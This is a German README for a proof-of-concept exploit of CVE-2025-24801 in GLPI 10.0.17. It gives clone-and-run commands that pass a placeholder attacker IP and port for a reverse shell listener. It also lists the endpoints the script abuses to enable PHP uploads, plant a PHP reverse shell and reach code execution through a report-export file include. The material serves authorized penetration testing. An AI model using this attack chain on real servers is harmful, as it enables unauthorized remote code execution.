
Proof-of-Concept-Exploit für CVE-2025-24801, eine LFI-zu-RCE-Schwachstelle in GLPI 10.0.17. Automatisiert den Login, aktiviert PHP-Uploads und lädt eine Reverse Shell für autorisierte Sicherheitstests hoch.
Dieses Repository enthält ein Proof-of-Concept-Skript (poc.py), das CVE-2025-24801 ausnutzt, eine LFI-zu-RCE-Schwachstelle in GLPI 10.0.17. Es automatisiert:
.php-Uploads durch Aktualisieren der Dokumenttyp-Einstellungengit clone https://github.com/fatkz/CVE-2025-24801.git
cd CVE-2025-24801
pip install -r requirements.txt
python3 poc.py \
--url https://target.example.com/glpi \
--user TECHNICIAN_USER \
--password "PASSWORD" \
--lhost ATTACKER_IP \
--lport 4444
--url: Basis-URL der GLPI-Instanz (z. B. )https://example.com/glpi--user / --password: Gültige GLPI-Techniker-Anmeldedaten--lhost / --lport: Angreifer-IP und -Port für den Reverse-Shell-ListenerDas Skript verwendet standardmäßig automatisch --doc-id 1, um den ersten Dokumenttyp zu aktualisieren.
Nach der Ausführung wird das Skript:
.php-Uploads durch Aktualisieren der Dokumenttyp-ID 1exploit.php mit einem PHP-Reverse-Shell-PayloadSie müssen dann manuell die LFI auslösen, indem Sie den hochgeladenen Dateinamen im PDF-Schriftarteninclude angeben (z. B. über die Berichtsexportfunktion), um RCE zu erreichen.
/front/login.php und sendet Anmeldedaten, um sich zu authentifizieren./front/documenttype.form.php?id=1 ab, parst das CSRF-Token und fügt php zu den erlaubten Erweiterungen hinzu./front/ticket.form.php für ein CSRF-Token ab, verwendet dann /ajax/fileupload.php (mit X-Requested-With: XMLHttpRequest), um eine PHP-Reverse-Shell hochzuladen.pdffont beim Berichtsexport angegeben wird.Dieses Tool ist ausschließlich für autorisierte Sicherheitstests und Bildungszwecke bestimmt. Verwenden Sie es nicht gegen Systeme ohne ausdrückliche Genehmigung.
Erstellt für Bildungs- und autorisierte Pentesting-Zwecke.